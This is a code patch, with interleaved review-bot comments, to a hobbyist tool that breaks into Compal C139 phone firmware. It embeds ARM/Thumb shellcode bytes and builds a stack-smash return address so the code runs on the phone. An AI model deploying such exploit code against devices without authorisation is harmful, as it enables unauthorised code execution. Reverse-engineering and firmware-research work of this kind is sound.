# HG changeset patch
# User Mychaela Falconia
# Date 1449734867 0
# Node ID 7166c8311b0d1fc696ec4f1a19465366e59fdb6a
# Parent 461f7ee5f2544d189a218c85935d0e932d0b19c7
tfc139 reworked to support both ARM and Thumb entry
diff -r 461f7ee5f254 -r 7166c8311b0d rvinterf/lowlevel/tfc139.c
--- a/rvinterf/lowlevel/tfc139.c Thu Dec 10 05:35:42 2015 +0000
+++ b/rvinterf/lowlevel/tfc139.c Thu Dec 10 08:07:47 2015 +0000
@@ -27,28 +27,30 @@
 time_t logtime;
 int no_output; /* for output.c */
-int wakeup_after_sec = 7;
+int wakeup_after_sec = 1;
 /* see ../../target-utils/tf-breakin/payload.S for the source */
-static u_char iram_payload[112] = {
- 0xD3, 0xF0, 0x21, 0xE3, 0x58, 0x10, 0x9F, 0xE5,
- 0xF5, 0x00, 0xA0, 0xE3, 0xB2, 0x00, 0xC1, 0xE1,
- 0xA0, 0x00, 0xA0, 0xE3, 0xB2, 0x00, 0xC1, 0xE1,
- 0x48, 0x60, 0x9F, 0xE5, 0x05, 0x00, 0xD6, 0xE5,
- 0x20, 0x00, 0x10, 0xE3, 0xFC, 0xFF, 0xFF, 0x0A,
- 0x2C, 0x10, 0x8F, 0xE2, 0x06, 0x20, 0xA0, 0xE3,
- 0x01, 0x00, 0xD1, 0xE4, 0x00, 0x00, 0xC6, 0xE5,
- 0x01, 0x20, 0x52, 0xE2, 0xFB, 0xFF, 0xFF, 0x1A,
- 0x05, 0x00, 0xD6, 0xE5, 0x40, 0x00, 0x10, 0xE3,
- 0xFC, 0xFF, 0xFF, 0x0A, 0x18, 0x10, 0x9F, 0xE5,
- 0x01, 0x2C, 0xA0, 0xE3, 0xB0, 0x20, 0xC1, 0xE1,
- 0x00, 0xF0, 0xA0, 0xE3, 0x02, 0x02, 0x02, 0x4F,
- 0x4B, 0x02, 0x00, 0x00, 0x02, 0xF8, 0xFF, 0xFF,
- 0x00, 0x58, 0xFF, 0xFF, 0x10, 0xFB, 0xFF, 0xFF
+static u_char shellcode[114] = {
+ 0x78, 0x47, 0xC0, 0x46, 0xD3, 0xF0, 0x21, 0xE3,
+ 0x50, 0x10, 0x9F, 0xE5, 0xF5, 0x00, 0xA0, 0xE3,
+ 0xB2, 0x00, 0xC1, 0xE1, 0xA0, 0x00, 0xA0, 0xE3,
+ 0xB2, 0x00, 0xC1, 0xE1, 0x40, 0x60, 0x9F, 0xE5,
+ 0x05, 0x00, 0xD6, 0xE5, 0x20, 0x00, 0x10, 0xE3,
+ 0xFC, 0xFF, 0xFF, 0x0A, 0x38, 0x10, 0x8F, 0xE2,
+ 0x06, 0x20, 0xA0, 0xE3, 0x01, 0x00, 0xD1, 0xE4,
+ 0x00, 0x00, 0xC6, 0xE5, 0x01, 0x20, 0x52, 0xE2,
+ 0xFB, 0xFF, 0xFF, 0x1A, 0x05, 0x00, 0xD6, 0xE5,
+ 0x40, 0x00, 0x10, 0xE3, 0xFC, 0xFF, 0xFF, 0x0A,
+ 0x10, 0x10, 0x9F, 0xE5, 0x01, 0x2C, 0xA0, 0xE3,
+ 0xB0, 0x20, 0xC1, 0xE1, 0x00, 0xF0, 0xA0, 0xE3,
+ 0x02, 0xF8, 0xFF, 0xFF, 0x00, 0x58, 0xFF, 0xFF,
+ 0x10, 0xFB, 0xFF, 0xFF, 0x02, 0x02, 0x02, 0x4F,
+ 0x4B, 0x02
 };
-static unsigned iram_load_addr = 0x800000;
+static unsigned shellcode_load_addr = 0x800000;
 static unsigned stack_smash_addr = 0x837C54;
+static int thumb_entry = 0;
 static u_char stack_smash_payload[4];
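Review bot: The embedded `shellcode[114]` does not agree with the generator that is supposed to produce it: mkembed.c in this same commit sets PAYLOAD_SIZE to 116 and prints `u_char shellcode[116]`, so the hand-pasted array is two bytes shorter than the tool output (presumably trailing section padding dropped by hand, but that is inferred). Either make mkembed emit the real byte count or record the trimming beside the array, e.g. `/* 114 bytes: mkembed output minus 2 trailing pad bytes; see payload.S */`, so the next regeneration does not silently reintroduce the mismatch. The default `wakeup_after_sec` also drops from 7 to 1 without mention in the commit message; a short why-comment on that line would help.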
@@ -77,6 +79,22 @@
 send_pkt_to_target(pkt, i + 1);
 }
+static void
+build_stack_smash_payload()
+{
+ unsigned jump_addr;
+
+ jump_addr = shellcode_load_addr;
+ if (thumb_entry)
+ jump_addr += 1;
+ else
+ jump_addr += 4;
+ stack_smash_payload[0] = jump_addr;
+ stack_smash_payload[1] = jump_addr >> 8;
+ stack_smash_payload[2] = jump_addr >> 16;
+ stack_smash_payload[3] = jump_addr >> 24;
+}
+
 main(argc, argv)
 char **argv;
 {
@@ -86,10 +104,10 @@
 fd_set fds;
 baudrate_name = "57600"; /* what C139 firmware uses */
- while ((c = getopt(argc, argv, "a:B:l:s:w:")) != EOF)
+ while ((c = getopt(argc, argv, "a:B:l:s:tw:")) != EOF)
 switch (c) {
 case 'a':
- iram_load_addr = strtoul(optarg, 0, 16);
+ shellcode_load_addr = strtoul(optarg, 0, 16);
 continue;
 case 'B':
 baudrate_name = optarg;
@@ -100,6 +118,9 @@
 case 's':
 stack_smash_addr = strtoul(optarg, 0, 16);
 continue;
+ case 't':
+ thumb_entry = 1;
+ continue;
 case 'w':
 wakeup_after_sec = strtoul(optarg, 0, 0);
 continue;
@@ -126,12 +147,9 @@
 fprintf(logF, "*** Log of TFC139 break-in session ***\n");
 }
 time(&logtime);
- output_line("Sending IRAM payload");
- send_compal_memwrite(iram_load_addr, iram_payload, sizeof iram_payload);
- stack_smash_payload[0] = iram_load_addr;
- stack_smash_payload[1] = iram_load_addr >> 8;
- stack_smash_payload[2] = iram_load_addr >> 16;
- stack_smash_payload[3] = iram_load_addr >> 24;
+ output_line("Sending shellcode RAM write");
+ send_compal_memwrite(shellcode_load_addr, shellcode, sizeof shellcode);
+ build_stack_smash_payload();
 for (;;) {
 FD_ZERO(&fds);
 FD_SET(target_fd, &fds);
diff -r 461f7ee5f254 -r 7166c8311b0d target-utils/tf-breakin/mkembed.c
--- a/target-utils/tf-breakin/mkembed.c Thu Dec 10 05:35:42 2015 +0000
+++ b/target-utils/tf-breakin/mkembed.c Thu Dec 10 08:07:47 2015 +0000
@@ -5,7 +5,7 @@
 #include
 #include
-#define PAYLOAD_SIZE 112
+#define PAYLOAD_SIZE 116
 u_char payload_buf[PAYLOAD_SIZE];
 read_binary(filename)
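Review bot: The `+= 1` and `+= 4` in build_stack_smash_payload are undocumented magic numbers whose meaning lives in another file: 1 is the Thumb-state bit for the entry address, and 4 is the length of the two-halfword Thumb prologue (`bx pc` / `nop`, the first four bytes of `shellcode`) that an ARM-state entry has to skip. If that prologue in payload.S ever changes length, this function silently produces a wrong entry point, so name the values and point at their origin, e.g. `#define THUMB_ENTRY_BIT 1 /* bit 0 set: enter in Thumb state */` and `#define ARM_ENTRY_OFFSET 4 /* skip the Thumb prologue; see target-utils/tf-breakin/payload.S */`. The definition should also read `build_stack_smash_payload(void)` rather than `()`, which in C is an old-style declaration that disables argument checking.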
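Review bot: `shellcode_load_addr` parsed from `-a` in the `case 'a'` arm is accepted without any check, yet both the Thumb prologue in payload.S (`bx pc` from Thumb state reads PC as the instruction address plus 4 and needs a word-aligned target) and the fixed `+ 4` ARM entry offset assume a 4-byte-aligned base; `strtoul` parse failures are likewise not detected, and the same applies to the pre-existing `-s` and `-w` parses. Rejecting a bad value at parse time is cheaper than a confusing failure on the target: `if (shellcode_load_addr & 3) { fprintf(stderr, "-a address must be word-aligned\n"); exit(1); }` after the assignment, with an `endptr`/`errno` check on the conversion itself. main() starts and ends outside this hunk.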
@@ -46,15 +46,17 @@
 perror(filename);
 exit(1);
 }
- fprintf(of, "u_char payload[%d] = {\n", PAYLOAD_SIZE);
+ fprintf(of, "u_char shellcode[%d] = {\n", PAYLOAD_SIZE);
 idx = 0;
- for (i = 0; i < 14; i++) {
+ for (i = 0; i < 15; i++) {
 for (j = 0; j < 8; j++) {
 if (j)
 putc(' ', of);
 else
 putc('\t', of);
 fprintf(of, "0x%02X,", payload_buf[idx++]);
+ if (idx >= PAYLOAD_SIZE)
+ break;
 }
 putc('\n', of);
 }
diff -r 461f7ee5f254 -r 7166c8311b0d target-utils/tf-breakin/payload.S
--- a/target-utils/tf-breakin/payload.S Thu Dec 10 05:35:42 2015 +0000
+++ b/target-utils/tf-breakin/payload.S Thu Dec 10 08:07:47 2015 +0000
@@ -1,5 +1,11 @@
 .text
 .org 0
+
+@ allow entry in Thumb state
+ .code 16
+ bx pc
+ nop
+ .code 32
 @ set CPSR like mot931c payload does
@@ -33,5 +39,5 @@
 strh r2, [r1]
 @ jump to it!
 mov pc, #0
-
+ .ltorg
 outstr: .byte 2,2,2,'O','K',2
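Review bot: The new `break` after the `idx >= PAYLOAD_SIZE` test only leaves the inner 8-byte loop; the outer loop is still hard-coded to 15 rows and keeps going, so the two are consistent only because 15 * 8 >= 116. For any PAYLOAD_SIZE of 112 or less the next outer iteration would print a tab and then read `payload_buf[idx++]` past the end of the array. Drive the outer loop from the byte count instead, `for (i = 0; idx < PAYLOAD_SIZE; i++) {`, which produces identical output for 116 and removes the literal 15 that has to be re-derived on every size change. The enclosing function starts outside this hunk.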
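Review bot: The Thumb prologue fixes a contract that nothing in this file states: ARM-state callers must enter at offset 4, and the counterpart `jump_addr += 4` is in build_stack_smash_payload() in rvinterf/lowlevel/tfc139.c, so a reader editing either file cannot see the coupling. Add a comment beside `.code 32`, e.g. `@ ARM-state entry is here at offset 4; keep in sync with the +4 in rvinterf/lowlevel/tfc139.c build_stack_smash_payload()`. The same comment should mention that `bx pc` from Thumb state relies on this image being loaded at a word-aligned address, since the load address is user-selectable in tfc139.c.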